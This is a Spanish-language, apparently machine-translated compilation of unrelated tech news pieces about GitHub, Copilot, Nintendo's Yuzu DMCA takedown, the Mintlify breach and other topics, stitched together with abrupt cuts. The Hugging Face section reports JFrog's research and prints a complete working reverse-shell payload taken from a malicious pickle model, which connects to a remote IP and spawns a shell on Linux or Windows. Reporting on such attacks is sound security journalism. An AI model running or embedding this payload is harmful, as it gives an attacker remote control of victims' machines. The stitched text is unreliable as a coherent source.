Nintendo envió un aviso de la Ley de Derechos de Autor del Milenio Digital (DMCA) para más de 8.000 repositorios de GitHub que alojan código del emulador Yuzu Switch, que el fabricante de Zelda describió anteriormente como que permite la «piratería a una escala colosal». La gran eliminación se produce dos meses después de que los creadores de Yuzu resolvieran rápidamente una demanda con Nintendo y su equipo legal notoriamente fácil de disparar por 2,4 millones de dólares.

IndustriaDeJuegos.biz informó por primera vez sobre el aviso DMCA, que afecta a 8.535 repositorios de GitHub. Las entidades redactadas que representan a Nintendo afirman que el código fuente de Yuzu contenido en los repositorios «elude ilegalmente las medidas de protección tecnológica de Nintendo y ejecuta copias ilegales de los juegos de Switch».

GitHub escribió en el aviso que los desarrolladores tendrán tiempo para cambiar su contenido antes de que se deshabilite. De acuerdo con su enfoque y marca amigable para los desarrolladores, la plataforma propiedad de Microsoft también ofreció recursos legales y orientación sobre cómo presentar contranotificaciones de DMCA.

El bombardeo legal de Nintendo, quizás no por coincidencia, se produce en un momento en que los emuladores de juegos están disfrutando de un resurgimiento. El mes pasado, Apple aflojó sus restricciones sobre los jugadores de juegos retro en la App Store (probablemente en respuesta a amenazas regulatorias), lo que llevó al emulador Delta a establecerse como la opción de facto y alcanzar el primer puesto de la App Store. Es posible que Nintendo haya calculado que el momento de éxito de los emuladores amenazaba sus resultados y comenzó por aplastar a aquellos que ponían en peligro más inmediatamente su flujo de ingresos.

Lamentablemente, el ataque legal en gran medida indefenso de Nintendo contra los emuladores ignora un uso crucial para ellos que no tiene que ver con la piratería. Los historiadores de juegos ven el software como un eje de la preservación del juego. Sin emuladores, Nintendo y otros titulares de derechos de autor podrían hacer que una parte de la historia quede obsoleta para las generaciones futuras, ya que su hardware correspondiente eventualmente será más difícil de conseguir.

¿Es el futuro del desarrollo de software un IDE impulsado por IA? GitHub está planteando la idea.

Antes de su conferencia anual GitHub Universe en San Francisco a principios de este otoño, GitHub anunció Copilot Workspace, un entorno de desarrollo que aprovecha lo que GitHub describe como “agentes impulsados ​​por Copilot” para ayudar a los desarrolladores a generar ideas, planificar, construir, probar y ejecutar código en lenguaje natural. .

Jonathan Carter, director de GitHub Next, el equipo de I+D de software de GitHub, presenta Workspace como una especie de evolución del asistente de codificación Copilot impulsado por IA de GitHub hacia una herramienta más general, basada en capacidades introducidas recientemente como Copilot Chat, que permite a los desarrolladores hacer preguntas sobre el código. en lenguaje natural.

“A través de la investigación, descubrimos que, para muchas tareas, el mayor punto de fricción para los desarrolladores era comenzar y, en particular, saber cómo abordar una tarea. [coding] problema, saber qué archivos editar y saber cómo considerar múltiples soluciones y sus compensaciones”, dijo Carter. «Por eso queríamos crear un asistente de IA que pudiera reunirse con los desarrolladores desde el inicio de una idea o tarea, reducir la energía de activación necesaria para comenzar y luego colaborar con ellos para realizar las ediciones necesarias en toda la base central».

Según el último recuento, Copilot tenía más de 1,8 millones de clientes individuales y 50.000 empresas. Pero Carter imagina una base mucho más grande, atraída por expansiones de funciones con un gran atractivo, como Workspace.

«Dado que los desarrolladores dedican gran parte de su tiempo a trabajar en [coding issues]»Creemos que podemos ayudar a empoderar a los desarrolladores todos los días a través de una ‘asociación de pensamiento’ con la IA», afirmó Carter. «Se puede pensar en Copilot Workspace como una experiencia complementaria y un entorno de desarrollo que complementa las herramientas y los flujos de trabajo existentes y permite simplificar una clase de tareas de desarrollador… Creemos que hay mucho valor que se puede ofrecer en un entorno de desarrollador nativo de IA que no sea No está limitado por los flujos de trabajo existentes”.

Ciertamente existe presión interna para que Copilot sea rentable.

Copilot pierde un promedio de 20 dólares al mes por usuario, según un informe del Wall Street Journal, y algunos clientes le cuestan a GitHub hasta 80 dólares al mes. Y el número de servicios rivales sigue creciendo. Está CodeWhisperer de Amazon, que la compañía puso a disposición de desarrolladores individuales de forma gratuita a finales del año pasado. También hay startups como Magic, Tabnine, Codegen y Laredo.

Dado un repositorio de GitHub o un error específico dentro de un repositorio, Workspace, respaldado por el modelo GPT-4 Turbo de OpenAI, puede crear un plan para (intentar) eliminar el error o implementar una nueva característica, basándose en la comprensión de los comentarios del repositorio. respuestas a problemas y una base de código más amplia. Los desarrolladores reciben sugerencias de código para corregir errores o nuevas funciones, junto con una lista de las cosas que necesitan para validar y probar ese código, además de controles para editarlo, guardarlo, refactorizarlo o deshacerlo.

El código sugerido se puede ejecutar directamente en Workspace y compartir entre los miembros del equipo a través de un enlace externo. Esos miembros del equipo, una vez en Workspace, pueden refinar y modificar el código como mejor les parezca.

Quizás la forma más obvia de iniciar Workspace es desde el nuevo botón «Abrir en Workspace» a la izquierda de las incidencias y las solicitudes de extracción en los repositorios de GitHub. Al hacer clic en él, se abre un campo para describir la tarea de ingeniería de software que se debe completar en lenguaje natural, como «Agregar documentación para los cambios en esta solicitud de extracción», que, una vez enviada, se agrega a una lista de «sesiones» dentro del nuevo Vista de espacio de trabajo dedicada.

Workspace ejecuta solicitudes sistemáticamente paso a paso, creando una especificación, generando un plan y luego implementando ese plan. Los desarrolladores pueden profundizar en cualquiera de estos pasos para obtener una vista granular del código sugerido y los cambios y eliminar, volver a ejecutar o reordenar los pasos según sea necesario.

«Si le preguntas a cualquier desarrollador dónde tiende a quedarse atascado en un nuevo proyecto, a menudo le escucharás decir que es saber por dónde empezar», dijo Carter. «Copilot Workspace elimina esa carga y ofrece a los desarrolladores un plan a partir del cual empezar a iterar».

Workspace ingresa a la vista previa técnica el lunes, optimizado para una variedad de dispositivos, incluidos los móviles.

Es importante destacar que, debido a que está en versión preliminar, Workspace no está cubierto por la política de indemnización de IP de GitHub, que promete ayudar con los honorarios legales de los clientes que enfrentan reclamos de terceros alegando que el código generado por IA que están usando infringe la propiedad intelectual. (Los modelos de IA generativa regurgitan notoriamente sus conjuntos de datos de entrenamiento, y GPT-4 Turbo fue entrenado en parte con código protegido por derechos de autor).

GitHub dice que no ha determinado cómo producirá Workspace, pero que utilizará la vista previa para «aprender más sobre el valor que ofrece y cómo lo usan los desarrolladores».

Creo que la pregunta más importante es: ¿Workspace solucionará los problemas existenciales que rodean a Copilot y otras herramientas de codificación impulsadas por IA?

Un análisis de más de 150 millones de líneas de código comprometidas con repositorios de proyectos en los últimos años realizado por GitClear, el desarrollador de la herramienta de análisis de código del mismo nombre, descubrió que Copilot estaba dando como resultado que se enviara más código erróneo a las bases de código y que se enviara más código. re-agregado en lugar de reutilizado y optimizado, creando dolores de cabeza para los mantenedores del código.

En otros lugares, los investigadores de seguridad han advertido que Copilot y herramientas similares pueden amplificar los errores y problemas de seguridad existentes en los proyectos de software. Y los investigadores de Stanford han descubierto que los desarrolladores que aceptan sugerencias de asistentes de codificación con tecnología de inteligencia artificial tienden a producir código menos seguro. (GitHub me destacó que utiliza un sistema de prevención de vulnerabilidades basado en inteligencia artificial para intentar bloquear el código inseguro, además de un filtro de duplicación de código opcional para detectar regurgitaciones de código público).

Sin embargo, los desarrolladores no rehuyen la IA.

En una encuesta de StackOverflow de junio de 2023, el 44% de los desarrolladores dijeron que ahora utilizan herramientas de inteligencia artificial en su proceso de desarrollo y el 26% planea hacerlo pronto. Gartner predice que el 75% de los ingenieros de software empresarial emplearán asistentes de código de IA para 2028.

Al enfatizar la revisión humana, tal vez Workspace pueda ayudar a limpiar parte del desorden introducido por el código generado por IA. Lo descubriremos pronto cuando Workspace llegue a manos de los desarrolladores.

«Nuestro objetivo principal con Copilot Workspace es aprovechar la IA para reducir la complejidad para que los desarrolladores puedan expresar su creatividad y explorar más libremente», dijo Carter. «Realmente creemos que la combinación de humanos e IA siempre será superior a uno u otro por sí solo, y eso es a lo que apostamos con Copilot Workspace».

Es un mal día para los insectos. Hoy temprano, Sentry anunció su función AI Autofix para depurar código de producción y ahora, unas horas más tarde, GitHub está lanzando la primera versión beta de su función Autofix de escaneo de código para encontrar y reparar vulnerabilidades de seguridad durante el proceso de codificación. Esta nueva característica combina las capacidades en tiempo real de Copilot de GitHub con CodeQL, el motor de análisis de código semántico de la compañía. La compañía presentó por primera vez esta capacidad en noviembre pasado.

GitHub promete que este nuevo sistema puede remediar más de dos tercios de las vulnerabilidades que encuentre, a menudo sin que los desarrolladores tengan que editar ningún código ellos mismos. La compañía también promete que la reparación automática del escaneo de código cubrirá más del 90% de los tipos de alertas en los lenguajes que admite, que actualmente son JavaScript, Typecript, Java y Python.

Esta nueva característica ya está disponible para todos. GitHub Clientes de Seguridad Avanzada (GHAS).

«Tal como GitHub Copilot libera a los desarrolladores de tareas tediosas y repetitivas, la reparación automática del escaneo de código ayudará a los equipos de desarrollo a recuperar el tiempo que antes se dedicaba a la remediación”, escribe GitHub en el anuncio de hoy. «Los equipos de seguridad también se beneficiarán de un volumen reducido de vulnerabilidades cotidianas, de modo que puedan centrarse en estrategias para proteger el negocio mientras se mantienen al día con un ritmo acelerado de desarrollo».

En segundo plano, esta nueva característica utiliza el motor CodeQL, el motor de análisis semántico de GitHub para encontrar vulnerabilidades en el código, incluso antes de que se haya ejecutado. La compañía puso a disposición del público una primera generación de CodeQL a fines de 2019 después de adquirir la startup de análisis de código Semmle, donde se incubó CodeQL. A lo largo de los años, realizó una serie de mejoras en CodeQL, pero una cosa que nunca cambió fue que CodeQL solo estaba disponible de forma gratuita para investigadores y desarrolladores de código abierto.

Ahora CodeQL está en el centro de esta nueva herramienta, aunque GitHub también señala que utiliza «una combinación de heurística y GitHub API de Copilot” para sugerir sus soluciones. Para generar las correcciones y sus explicaciones, GitHub utiliza el modelo GPT-4 de OpenAI. Y aunque GitHub claramente tiene la suficiente confianza como para sugerir que la gran mayoría de las sugerencias de autocorrección serán correctas, la compañía señala que «un pequeño porcentaje de las correcciones sugeridas reflejarán un malentendido significativo del código base o la vulnerabilidad».

La startup de documentación Mintlify dice que docenas de clientes tuvieron tokens de GitHub expuestos en una violación de datos a principios de mes y divulgados públicamente la semana pasada.

Mintlify ayuda a los desarrolladores a crear documentación para su software y código fuente solicitando acceso y accediendo directamente a los repositorios de código fuente de GitHub del cliente. Mintlify cuenta entre sus clientes a empresas emergentes de tecnología financiera, bases de datos e inteligencia artificial.

En una publicación de blog el lunes, Mintlify culpó del incidente del 1 de marzo a una vulnerabilidad en sus propios sistemas, pero dijo que, como resultado, 91 de sus clientes vieron comprometidos sus tokens de GitHub.

Estos tokens privados permiten a los usuarios de GitHub compartir el acceso a su cuenta con aplicaciones de terceros, incluidas empresas como Mintlify. Si estos tokens son robados, un atacante podría obtener el mismo nivel de acceso al código fuente de una persona que el token permite.

«Los usuarios han sido notificados y estamos trabajando con GitHub para identificar si los tokens se utilizaron para acceder a repositorios privados», escribió el cofundador de Mintlify, Han Wang, en una publicación de blog.

La noticia del incidente se hizo pública la semana pasada cuando algunos usuarios de Reddit y Hacker News comentaron después de recibir un correo electrónico de Mintlify el viernes sobre el incidente, días después de que la publicación del blog de la compañía inicialmente dijera a los clientes que «no se requiere ninguna otra acción de su parte».

En una publicación sobre la violación en Hacker News, Wang dijo que una vulnerabilidad en sus sistemas estaba filtrando las credenciales de administrador interno de la compañía a los clientes. Esas credenciales podrían luego usarse para acceder a los puntos finales internos de la compañía y acceder a otra información confidencial no especificada del usuario, dijo Wang.

Wang dijo que la compañía estaba en el proceso de desaprobar el uso de tokens privados «para evitar que un incidente como este vuelva a ocurrir».

Si bien la publicación del blog describe a la persona que descubrió la vulnerabilidad como un reportero de recompensas por errores, el cofundador de la compañía, Wang, describió los eventos como maliciosos.

«Los objetivos de este ataque fueron los tokens de GitHub de nuestros usuarios», dijo Wang a TechCrunch por correo electrónico.

“Las investigaciones con un cliente afectado revelaron que el atacante probablemente no utilizó el token filtrado. Actualmente estamos trabajando con GitHub y nuestros clientes para descubrir si el atacante utilizó alguno de los otros tokens”, dijo Wang.

El código subido a la plataforma de desarrollo de inteligencia artificial Hugging Face instaló de forma encubierta puertas traseras y otros tipos de malware en las máquinas de los usuarios finales, dijeron el jueves investigadores de la firma de seguridad JFrog en un informe que probablemente sea un presagio de lo que está por venir.

En total, dijeron los investigadores de JFrog, encontraron aproximadamente 100 envíos que realizaban acciones ocultas y no deseadas cuando se descargaban y cargaban en el dispositivo de un usuario final. La mayoría de los modelos de aprendizaje automático marcados, todos los cuales no fueron detectados por Hugging Face, parecían ser pruebas de concepto benignas cargadas por investigadores o usuarios curiosos. Los investigadores de JFrog dijeron en un correo electrónico que 10 de ellos eran «verdaderamente maliciosos» porque realizaban acciones que en realidad comprometían la seguridad de los usuarios cuando se cargaban.

Control total de los dispositivos de los usuarios.

Un modelo generó especial preocupación porque abría un caparazón inverso que le daba a un dispositivo remoto en Internet control total del dispositivo del usuario final. Cuando los investigadores de JFrog cargaron el modelo en una máquina de laboratorio, la presentación de hecho cargó un caparazón inverso pero no tomó ninguna otra medida.

Eso, la dirección IP del dispositivo remoto y la existencia de shells idénticos conectados en otros lugares plantearon la posibilidad de que la presentación también fuera obra de investigadores. Sin embargo, un exploit que abre un dispositivo a dicha manipulación es una violación importante de la ética de los investigadores y demuestra que, al igual que el código enviado a GitHub y otras plataformas de desarrollo, los modelos disponibles en sitios de IA pueden plantear riesgos graves si no se examinan cuidadosamente primero.

«La carga útil del modelo otorga al atacante un caparazón en la máquina comprometida, permitiéndole obtener control total sobre las máquinas de las víctimas a través de lo que comúnmente se conoce como ‘puerta trasera'», escribió el investigador principal de JFrog, David Cohen. “Esta infiltración silenciosa podría potencialmente otorgar acceso a sistemas internos críticos y allanar el camino para filtraciones de datos a gran escala o incluso espionaje corporativo, afectando no solo a usuarios individuales sino potencialmente a organizaciones enteras en todo el mundo, dejando a las víctimas completamente inconscientes de su estado comprometido. .”

¿Cómo lo hizo Baller432?

Al igual que los otros nueve modelos verdaderamente maliciosos, el que se analiza aquí utiliza pickle, un formato que desde hace tiempo se reconoce como intrínsecamente riesgoso. Pickles se usa comúnmente en Python para convertir objetos y clases en código legible por humanos en un flujo de bytes para que pueda guardarse en el disco o compartirse a través de una red. Este proceso, conocido como serialización, presenta a los piratas informáticos la oportunidad de introducir código malicioso en el flujo.

El modelo que generó el shell inverso, enviado por una parte con el nombre de usuario baller432, pudo evadir el escáner de malware de Hugging Face utilizando el método «__reduce__» de pickle para ejecutar código arbitrario después de cargar el archivo del modelo.

Cohen de JFrog explicó el proceso en un lenguaje mucho más detallado técnicamente:

Al cargar modelos de PyTorch con transformadores, un enfoque común implica utilizar la función torch.load(), que deserializa el modelo desde un archivo. Particularmente cuando se trata de modelos PyTorch entrenados con la biblioteca Transformers de Hugging Face, este método a menudo se emplea para cargar el modelo junto con su arquitectura, pesos y cualquier configuración asociada. Transformers proporciona un marco integral para tareas de procesamiento del lenguaje natural, facilitando la creación y el despliegue de modelos sofisticados. En el contexto del repositorio «baller423/goober2», parece que la carga útil maliciosa se inyectó en el archivo del modelo PyTorch utilizando el método __reduce__ del módulo pickle. Este método, como se demuestra en la referencia proporcionada, permite a los atacantes insertar código Python arbitrario en el proceso de deserialización, lo que podría provocar un comportamiento malicioso cuando se carga el modelo.

Tras el análisis del archivo PyTorch utilizando la herramienta voluble, extrajimos con éxito la siguiente carga útil:

RHOST = "210.117.212.93"
RPORT = 4242

from sys import platform

if platform != 'win32':
    import threading
    import socket
    import pty
    import os

    def connect_and_spawn_shell():
        s = socket.socket()
        s.connect((RHOST, RPORT))
        [os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]
        pty.spawn("/bin/sh")

    threading.Thread(target=connect_and_spawn_shell).start()
else:
    import os
    import socket
    import subprocess
    import threading
    import sys

    def send_to_process(s, p):
        while True:
            p.stdin.write(s.recv(1024).decode())
            p.stdin.flush()

    def receive_from_process(s, p):
        while True:
            s.send(p.stdout.read(1).encode())

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    while True:
        try:
            s.connect((RHOST, RPORT))
            break
        except:
            pass

    p = subprocess.Popen(["powershell.exe"], 
                         stdout=subprocess.PIPE,
                         stderr=subprocess.STDOUT,
                         stdin=subprocess.PIPE,
                         shell=True,
                         text=True)

    threading.Thread(target=send_to_process, args=[s, p], daemon=True).start()
    threading.Thread(target=receive_from_process, args=[s, p], daemon=True).start()
    p.wait()

Desde entonces, Hugging Face eliminó el modelo y los demás señalados por JFrog.

Lo que necesitas saber

• Apiiro, una firma de ciberseguridad, informó que GitHub ha sufrido un ataque masivo que podría impactar a miles de personas.
• Este ataque implica clonar repositorios limpios y seguros, agregar código malicioso y ofuscado y volver a cargarlos.
• GitHub está intentando eliminar los repositorios maliciosos pero parece que no puede rastrearlos a todos.

---

En una reciente informe de Apiiror, los equipos de investigación de seguridad y ciencia de datos descubrieron un ataque muy grande. Apiiro lo llama una campaña de confusión de repositorios maliciosos. Los equipos de Apiiro estiman que más de 100.000 repositorios de GitHub están afectados, posiblemente incluso millones. Desafortunadamente, esta no es la primera vez que tenemos que informar sobre el uso de GitHub por parte de actores maliciosos. Hace unos meses, nosotros discutido cómo se utiliza GitHub para facilitar el ransomware e incluso crear canales de comando y control para ataques de ransomware.

Estos ataques no son demasiado complicados ni difíciles de detener, el problema es que los ataques ocurren a un ritmo tan alarmante que GitHub parece tener problemas para seguir el ritmo.

¿Qué son los ataques de confusión al repositorio?

La facilidad de generación automática de cuentas y repositorios en GitHub y similares, utilizando API cómodas y límites de velocidad flexibles que son fáciles de eludir, combinados con la gran cantidad de repositorios entre los que esconderse, lo convierten en un objetivo perfecto para infectar de forma encubierta la cadena de suministro de software. .

GitHub anunció hoy la disponibilidad general de Copilot Enterprise, la versión de $39 al mes de su herramienta de finalización de código y chatbot centrado en desarrolladores para grandes empresas. Copilot Enterprise incluye todas las funciones del plan Business existente, incluida la indemnización de propiedad intelectual, pero lo amplía con una serie de funciones cruciales para equipos más grandes. Lo más destacado aquí es la capacidad de hacer referencia al código interno y la base de conocimientos de una organización. Copilot ahora también está integrado con el motor de búsqueda Bing de Microsoft (actualmente en versión beta) y pronto, los usuarios también podrán ajustar los modelos de Copilot basándose en el código base existente de un equipo.

Con eso, los nuevos desarrolladores de un equipo pueden, por ejemplo, preguntarle a Copilot cómo implementar una imagen de contenedor en la nube y obtener una respuesta específica para el proceso de su organización. Después de todo, para muchos desarrolladores, no es necesariamente comprender la base del código lo que es un obstáculo para ser productivo al mover empresas, sino comprender los diferentes procesos, aunque Copilot obviamente también puede ayudar a comprender el código.

Muchos equipos ya mantienen su documentación en repositorios de GitHub hoy en día, lo que hace que a Copilot le resulte relativamente fácil razonar sobre ella. De hecho, como me dijo el CEO de GitHub, Thomas Dohmke, dado que GitHub almacena prácticamente todos sus documentos internos en el servicio (y recientemente dio acceso a estas nuevas características a todos sus empleados), algunas personas han comenzado a usarlo para preguntas que no son de ingeniería. También, y comencé a preguntarle a Copilot sobre políticas de vacaciones, por ejemplo.

Dohmke me dijo que los clientes habían estado solicitando estas funciones para hacer referencia a información interna desde los primeros días de Copilot. “Muchas de las cosas que los desarrolladores hacen dentro de las organizaciones son diferentes de lo que hacen en casa o en el código abierto, en el sentido de que las organizaciones tienen un proceso o una determinada biblioteca para usar, y muchas de ellas tienen herramientas, sistemas y dependencias internas. que no existen así afuera”, anotó.

En cuanto a la integración de Bing, Dohmke señaló que esto sería útil para preguntarle a Copilot sobre cosas que pueden haber cambiado desde que se entrenó originalmente el modelo (piense en bibliotecas de código abierto o API). Por ahora, esta característica solo está disponible en la versión Enterprise y aunque Dohmke no dijo mucho sobre si llegará también a otras ediciones, no me sorprendería que GitHub llevara esta capacidad a otros niveles en un momento posterior. , también.

Una característica que probablemente seguirá siendo una característica empresarial (en parte debido a su costo asociado) es el ajuste, que se lanzará pronto. «Permitimos que las empresas elijan un conjunto de repositorios en su organización GitHub y luego ajusten el modelo en esos repositorios», explicó Dohmke. «Estamos abstrayendo la complejidad de la IA generativa y realizando ajustes lejos del cliente y permitiéndole aprovechar su base de código para generar un modelo optimizado para él que luego se utiliza en los escenarios de Copilot». Señaló que esto también significa que el modelo no puede estar tan actualizado como cuando se utilizan incrustaciones, habilidades y agentes (como el nuevo agente de Bing). Sostiene que todo esto es complementario y que los clientes que ya están probando esta característica están viendo mejoras significativas. Esto es especialmente cierto para los equipos que trabajan con bases de código en lenguajes que no se usan tan ampliamente como Python y JavaScript, o con bibliotecas internas que realmente no existen fuera de una organización.

Además de hablar sobre el lanzamiento de hoy, también le pregunté a Dohmke sobre su pensamiento de alto nivel sobre hacia dónde se dirige Copilot a continuación. La respuesta es esencialmente “más Copilot en más lugares. Creo que, durante el próximo año, veremos un enfoque cada vez mayor en esa experiencia de extremo a extremo de colocar copilotos donde ya haces el trabajo en lugar de crear un nuevo destino para copiar y pegar cosas allí. Creo que ahí es donde nosotros en GitHub estamos increíblemente entusiasmados con la oportunidad que tenemos al poner Copilot en github.com al tener Copilot disponible en el lugar donde los desarrolladores ya están colaborando, donde ya están construyendo el software del mundo”.

Hablando sobre la tecnología subyacente y hacia dónde se dirige, Dohmke señaló que la función de autocompletar actualmente se ejecuta en GPT 3.5 Turbo. Debido a sus requisitos de latencia, GitHub nunca trasladó ese modelo a GPT 4, pero Dohmke también señaló que el equipo ha actualizado el modelo «más de media docena de veces» desde el lanzamiento de Copilot Business.

Por ahora, no parece que GitHub vaya a seguir el modelo de Google de diferenciar sus niveles de precios por el tamaño de los modelos que impulsan esas experiencias. “Diferentes casos de uso requieren diferentes modelos. Las diferentes optimizaciones (latencia, precisión, calidad del resultado, IA responsable) para cada versión del modelo desempeñan un papel importante para garantizar que el resultado sea ético, conforme y seguro y no genere un código de menor calidad de lo que esperan nuestros clientes. . Continuaremos por ese camino de utilizar los mejores modelos para las diferentes partes de la experiencia Copilot”, dijo Dohmke.

Es comprensible que muchas personas (como, por ejemplo, los periodistas) estén preocupadas por lo que la inteligencia artificial generativa podría significar para el futuro de su profesión. No ayuda que los pronósticos de los expertos sobre el tema ofrezcan un cóctel confuso de emoción con los ojos muy abiertos, escepticismo mordaz y desesperación distópica.

Sin embargo, algunos trabajadores ya viven en una versión potencial del futuro de la IA generativa: los programadores informáticos.

«Los desarrolladores han llegado a la era de la IA», afirma Thomas Dohmke, director ejecutivo de GitHub. “La única pregunta es: ¿a qué velocidad se sube a bordo? ¿O va a quedarse estancado en el pasado, en el lado equivocado de la ‘polaridad de la productividad’?

En junio de 2021, GitHub lanzó una versión preliminar de una ayuda de programación llamada Copilot, que utiliza IA generativa para sugerir cómo completar grandes fragmentos de código tan pronto como una persona comienza a escribir. Copilot es ahora una herramienta paga y un gran éxito. El propietario de GitHub, Microsoft, dijo en sus últimos resultados trimestrales que ahora hay 1,3 millones de cuentas pagas de Copilot (un aumento del 30 por ciento con respecto al trimestre anterior) y señaló que 50.000 empresas diferentes utilizan el software.

Dohmke dice que los últimos datos de uso de Copilot muestran que casi la mitad de todo el código producido por los usuarios es generado por IA. Al mismo tiempo, afirma que hay pocas señales de que estos programas de IA puedan funcionar sin supervisión humana. «Existe un claro consenso entre la comunidad de desarrolladores después de utilizar estas herramientas en que es necesario ser un copiloto de programador en pareja», afirma Dohmke.

El poder de Copilot reside en cómo abstrae la complejidad para un programador que intenta resolver un problema, dice Dohmke. Él compara esto con la forma en que los lenguajes de programación modernos ocultan detalles complicados que los lenguajes anteriores de nivel inferior requerían que los codificadores discutieran. Dohmke añade que los programadores más jóvenes aceptan especialmente Copilot y que parece especialmente útil para resolver problemas de codificación de principiantes. (Esto tiene sentido si se considera que Copilot aprendió de una gran cantidad de códigos publicados en línea, donde las soluciones a problemas de principiantes superan en número a los ejemplos de técnicas de codificación abstrusas y enrarecidas).

«Estamos viendo la evolución del desarrollo de software», dice Dohmke.

Nada de eso significa que la IA no alterará la demanda de mano de obra de los desarrolladores. La investigación de GitHub en colaboración con el MIT muestra que Copilot permitió a los programadores que se enfrentaban a tareas relativamente simples completar su trabajo, en promedio, un 55 por ciento más rápido. Este aumento de la productividad sugiere que las empresas podrían realizar el mismo trabajo con menos programadores, pero podrían utilizar esos ahorros para gastar más en mano de obra en otros proyectos.

Incluso para quienes no saben codificar, estos hallazgos (y la rápida adopción de Copilot) son potencialmente instructivos. Microsoft está desarrollando AI Copilots, como los llama, diseñados para ayudar a escribir correos electrónicos, elaborar hojas de cálculo o analizar documentos para su software Office. Incluso introdujo una tecla Copilot en las últimas PC con Windows, su primer cambio importante en un botón del teclado en décadas. Competidores como Google están creando herramientas similares. El éxito de GitHub podría estar ayudando a impulsar este impulso para brindarles a todos un asistente de trabajo con IA.

«Hay buena evidencia empírica y datos sobre GitHub Copilot y las estadísticas de productividad que lo rodean», dijo el CEO de Microsoft, Satya Nadella, en la conferencia telefónica sobre ganancias más reciente de la compañía. Añadió que espera que se sientan beneficios similares entre los usuarios de otros Copilots de Microsoft. Microsoft ha creado un sitio donde puedes probar su Copilot para Windows. Confieso que no me queda claro qué tan similares son las tareas que quizás quieras realizar en Windows con las que haces en GitHub Copilot, donde usas código para lograr objetivos claros.

Existen otros posibles efectos secundarios de herramientas como GitHub Copilot además del desplazamiento laboral. Por ejemplo, una mayor dependencia de la automatización podría provocar que se introduzcan más errores en el código. Un estudio reciente afirmó haber encontrado evidencia de tal tendencia, aunque Dohmke dice que solo informó un aumento general de errores desde que se introdujo Copilot, no evidencia directa de que la IA auxiliar estuviera causando un aumento de errores. Si bien esto es cierto, parece justo preocuparse de que los codificadores menos experimentados puedan pasar por alto errores al confiar en la ayuda de la IA, o que la calidad general del código pueda disminuir gracias al autocompletado.

Dada la popularidad de Copilot, no pasará mucho tiempo antes de que tengamos más datos sobre esa cuestión. Aquellos de nosotros que trabajamos en otros empleos pronto descubriremos si nos espera el mismo aumento de productividad que los programadores y los trastornos corporativos que conllevan.

Es posible que haya oído hablar de varios proyectos para respaldar los mejores fragmentos de la Tierra en caso de que ocurriera algo catastrófico. La Bóveda Mundial de Semillas de Svalbard, por ejemplo, mantiene una «reserva» de más de un millón de semillas para evitar que alguna sea erradicada. Más adelante se encuentra otra copia de seguridad de suma importancia: todos los repositorios de GitHub activos hasta 2020, enterrados en lo profundo del permafrost.

Inspirado en la Bóveda Global de Semillas, el Arctic World Archive (AWA) es una colección de contenedores llenos de datos en una mina de carbón fuera de servicio, entre 250 y 300 metros de profundidad. Cada contenedor está lleno de carretes y carretes de datos, con apariencia de carretes de película en un cine antiguo.

Hace apenas unos días, proveedor de computadoras portátiles y de bolsillo, Ayaneo anunció su primera computadora de mano SteamOS, llamada Next Lite. Dos aspectos del lanzamiento lo hicieron destacar: en primer lugar, el precio estaría dirigido firmemente al sector económico y en segundo lugar, sería la primera computadora de mano que no sea Steam Deck y que se venderá con el sistema operativo de código abierto de Valve instalado en lugar de Windows. Nos comunicamos con Ayaneo para obtener más detalles y amablemente nos contó la información.

Algunos aspectos ya los conocíamos, como la pantalla IPS de 800p de 7 pulgadas y la batería de 47 Wh, pero ahora sabemos qué alimenta el dispositivo portátil y no es exactamente lo que esperábamos. En el interior se podrá elegir entre dos APU AMD: Ryzen 5 4500U y Ryzen 7 4800U.